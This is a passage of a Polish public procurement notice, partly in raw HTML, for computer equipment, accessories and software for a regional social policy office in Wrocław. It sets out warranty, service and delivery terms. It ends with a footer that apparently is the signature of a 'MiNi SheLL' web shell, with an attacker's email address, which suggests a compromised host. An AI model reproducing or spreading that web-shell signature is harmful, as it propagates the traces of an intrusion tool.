Przedmiotem zamówienia jest jednorazowa dostawa 6  sztuk fabrycznie nowych urządzeń wielofunkcyjnych (Zadanie 4)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A).
Szczegółowe określenie przedmiotu zamówienia zawiera formularz kalkulacji cenowej stanowiącej załącznik nr 2d do SIWZ.
Wykonawca udzieli nie krótszej niż 24 miesięcznej gwarancji na zakupiony sprzęt, która rozpoczyna swój bieg od dnia dostarczenia towarów do Dolnośląskiego Ośrodka Polityki Społecznej. Dostarczenie towarów będzie potwierdzone protokołem odbioru.
Wykonawca zobowiązuje się do przedłużenia okresu gwarancji o pełen okres niesprawności dostarczanego sprzętu.
W przypadku awarii sprzętu Wykonawca zobowiązuje się do usunięcia usterki w terminie max. 14 dni roboczych od daty przyjęcia zgłoszenia.
Jeżeli uszkodzenie nie zostanie usunięte w terminie 14 dni roboczych od dnia przyjęcia zgłoszenia Wykonawca zapewni urządzenie zastępcze na czas naprawy.
W przypadku 3 krotnej naprawy gwarancyjnej tego samego elementu lub podzespołu Wykonawca jest zobowiązany wymienić ten element (podzespół) lub przedmiot umowy na nowy w ciągu 14 dni roboczych do dnia stwierdzenia wady przedmiotu umowy.
Wykonawca jest zobowiązany udzielić 24 miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części.
Wymagany serwis od poniedziałku do piątku  (dni robocze) w godz. 8:00 - 16:00.
Wszelkie koszty związane ze świadczeniem usług gwarancyjnych obciążają Wykonawcę.
Wykonawca dostarczy przedmiot zamówienia w jednorazowej dostawie do Dolnośląskiego Ośrodka Pomocy Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8.
Wykonawca zobowiązuje się do dostarczenia Zamawiającemu kart gwarancyjnych do każdego z dostarczonych urządzeń.  
Zamawiający zastrzega sobie prawo do niewykorzystania całości zamówienia.
Zamawiający wymaga aby dostarczony sprzęt był fabrycznie nowy, wyprodukowany w 2009 r.
Zamawiający wymaga aby dostarczony sprzęt posiadał autoryzację producenta sprzętu dla firmy serwisującej.
Trzy sztuki fabrycznie nowych urządzeń wielofunkcyjnych zostały zakupione w ramach Projektu systemowego DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, współfinansowana z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem zamówienia jest jednorazowa dostawa różnych fabrycznie nowych akcesoriów komputerowych (Zadanie 5)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - ZADANIE 5 jest jednorazowa dostawa różnych fabrycznie nowych akcesoriów komputerowych.
 Przedmiotem zamówienia jest jednorazowa dostawa różnych fabrycznie nowych akcesoriów komputerowych (Zadanie 5)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A).
 Szczegółowe określenie przedmiotu zamówienia zawiera formularz kalkulacji cenowej stanowiącej załącznik nr 2e do SIWZ.
Wykonawca udzieli nie krótszej niż 12 miesięcznej gwarancji na zakupione akcesoria komputerowe, która rozpoczyna swój bieg od dnia dostarczenia towarów do Dolnośląskiego Ośrodka Polityki Społecznej. Dostarczenie towarów będzie potwierdzone protokołem odbioru.
Wykonawca zobowiązuje się do przedłużenia okresu gwarancji o pełen okres niesprawności dostarczanego sprzętu.
W przypadku awarii sprzętu Wykonawca zobowiązuje się do usunięcia usterki w terminie max. 14 dni roboczych od daty przyjęcia zgłoszenia.
Jeżeli uszkodzenie nie zostanie usunięte w terminie 14 dni roboczych od dnia przyjęcia zgłoszenia Wykonawca zapewni urządzenie zastępcze na czas naprawy.
W przypadku 3 krotnej naprawy gwarancyjnej tego samego elementu lub podzespołu Wykonawca jest zobowiązany wymienić ten element (podzespół) lub przedmiot umowy na nowy w ciągu 14 dni roboczych do dnia stwierdzenia wady przedmiotu umowy.
Wykonawca jest zobowiązany udzielić  12  miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części.
Wymagany serwis od poniedziałku do piątku  (dni robocze) w godz. 8:00 - 16:00.
Wszelkie koszty związane ze świadczeniem usług gwarancyjnych obciążają Wykonawcę.
Wykonawca dostarczy przedmiot zamówienia w jednorazowej dostawie do Dolnośląskiego Ośrodka Pomocy Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8.
Wykonawca zobowiązuje się do dostarczenia Zamawiającemu kart gwarancyjnych do każdego z dostarczonych urządzeń.  
 Zamawiający zastrzega sobie prawo do niewykorzystania całości zamówienia.
 Część akcesoriów komputerowych została zakupiona w ramach Projektu systemowego DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, współfinansowana z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.23.74.10-6, 30.23.74.60-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przedmiotem zamówienia jest jednorazowa dostawa 1 sztuki specjalistycznego oprogramowania komputerowego  (Zadanie 6)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - ZADANIE 6 jest jednorazowa dostawa 1 sztuki specjalistycznego oprogramowania komputerowego. 
Przedmiotem zamówienia jest jednorazowa dostawa 1 sztuki specjalistycznego oprogramowania komputerowego  (Zadanie 6)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A).
 Szczegółowe określenie przedmiotu zamówienia zawiera formularz kalkulacji cenowej stanowiącej załącznik nr 2f do SIWZ.
Wykonawca dostarczy przedmiot zamówienia w jednorazowej dostawie do Dolnośląskiego Ośrodka Pomocy Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8.
Zamawiający zastrzega sobie prawo do niewykorzystania całości zamówienia..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.70.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com